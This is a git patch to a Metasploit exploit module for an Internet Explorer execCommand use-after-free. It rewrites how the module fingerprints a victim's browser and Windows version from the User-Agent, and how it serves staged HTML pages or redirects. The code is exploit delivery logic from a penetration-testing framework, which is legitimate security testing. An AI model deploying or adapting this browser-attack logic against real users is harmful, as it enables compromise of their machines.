From 2db2c780d62d28307226a11c692e93addd72f839 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Mon, 24 Sep 2012 17:38:19 -0500 Subject: [PATCH] Additional changes Updated get_target function, comment for original author, possible bug in handling page redirection. --- .../windows/browser/ie_execcommand_uaf.rb | 56 +++++++++++-------- 1 file changed, 32 insertions(+), 24 deletions(-) diff --git a/modules/exploits/windows/browser/ie_execcommand_uaf.rb b/modules/exploits/windows/browser/ie_execcommand_uaf.rb index aa7dac9eaa..cb24f19783 100644 --- a/modules/exploits/windows/browser/ie_execcommand_uaf.rb +++ b/modules/exploits/windows/browser/ie_execcommand_uaf.rb @@ -39,7 +39,7 @@ class Metasploit3 < Msf::Exploit::Remote 'License' => MSF_LICENSE, 'Author' => [ - 'unknown', # Some secret ninja + 'unknown', # via ZDI 'eromang', # First public discovery 'binjo', 'sinn3r', # Metasploit @@ -90,21 +90,28 @@ class Metasploit3 < Msf::Exploit::Remote #If the user is already specified by the user, we'll just use that return target if target.name != 'Automatic' - if agent =~ /NT 5\.1/ and agent =~ /MSIE 7/ - return targets[1] #IE 7 on Windows XP SP3 - elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 8/ - return targets[2] #IE 8 on Windows XP SP3 - elsif agent =~ /NT 6\.0/ and agent =~ /MSIE 7/ - return targets[3] #IE 7 on Windows Vista - elsif agent =~ /NT 6\.0/ and agent =~ /MSIE 8/ - return targets[4] #IE 8 on Windows Vista - elsif agent =~ /NT 6\.1/ and agent =~ /MSIE 8/ - return targets[5] #IE 8 on Windows 7 - elsif agent =~ /NT 6\.1/ and agent =~ /MSIE 9/ - return targets[6] #IE 9 on Windows 7 - else - return nil + nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || '' + ie = agent.scan(/MSIE (\d)/).flatten[0] || '' + + ie_name = "IE #{ie}" + + case nt + when '5.1' + os_name = 'Windows XP SP3' + when '6.0' + os_name = 'Windows Vista' + when '6.1' + os_name = 'Windows 7' end + + targets.each do |t| + if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name)) + vprint_status("Target selected as: #{t.name}") + return t + end + end + + return nil end def junk(n=4) @@ -294,7 +301,7 @@ class Metasploit3 < Msf::Exploit::Remote js.obfuscate end - html = <<-EOS + html = %Q| - EOS + | return html end @@ -345,10 +352,13 @@ class Metasploit3 < Msf::Exploit::Remote end def on_request_uri(cli, request) - print_status request.headers['User-Agent'] - agent = request.headers['User-Agent'] + uri = request.uri + agent = request.headers['User-Agent'] my_target = get_target(agent) + vprint_status("Requesting: #{uri}") + print_status(agent) + # Avoid the attack if the victim doesn't have the same setup we're targeting if my_target.nil? print_error("Browser not supported, sending a 404: #{agent.to_s}") @@ -356,15 +366,13 @@ class Metasploit3 < Msf::Exploit::Remote return end - vprint_status("Requesting: #{request.uri}") - - if request.uri =~ /#{@html2_name}/ + if uri =~ /#{@html2_name}/ print_status("Loading #{@html2_name}") html = load_html2 - elsif request.uri =~ /#{@html1_name}/ + elsif uri =~ /#{@html1_name}/ print_status("Loading #{@html1_name}") html = load_html1(cli, my_target) - elsif request.uri =~ /\/$/ or request.uri =~ /#{this_resource}$/ + elsif uri =~ /\/$/ or (!this_resource.empty? and uri =~ /#{this_resource}$/) print_status("Redirecting to #{@html1_name}") send_redirect(cli, "#{this_resource}/#{@html1_name}") return